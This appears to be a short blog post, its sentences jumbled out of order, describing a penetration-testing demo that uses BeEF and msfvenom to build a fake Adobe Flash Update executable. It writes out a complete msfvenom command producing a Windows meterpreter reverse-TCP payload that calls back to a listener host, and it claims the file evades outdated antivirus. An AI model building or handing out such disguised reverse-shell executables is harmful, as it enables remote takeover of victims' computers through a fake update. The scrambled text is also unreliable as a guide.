![]() msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp lhost= 192.168.120.130 lport=4444 -f exe -o /tmp/FlashUpdate.exe In our test case, the complete command will look like as shown in the below image. >msfvenom -a –platform -p lhost= lport= -f -o More details on ‘msfvenom’ can be found here. ‘msfvenom’ tool is a combination of ‘msfpayload’ and ‘ msfencode‘, putting both these tools into a single framework instance. ![]() We will use ‘msfvenom’ tool to create the malicious executable file. IP Address: 192.168.120.130 Methodology Create a malicious package – Fake Adobe Flash Update We will write a separate post to discuss advanced techniques to be used in such cases. Please note, this method may not work if the AV solution is updated. ![]() This demo shows how to bypass backdated Anti-virus(AV) solutions and gain a meterpreter session, using a malicious Adobe Flash Update executable file. A professional pen-tester can use this to assess the security posture of a target environment.Īn important point to note is that BeEF uses a client-side attack vector. Browser Exploitation Framework (BeEF) is a security tool to conduct penetration tests on Websites.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |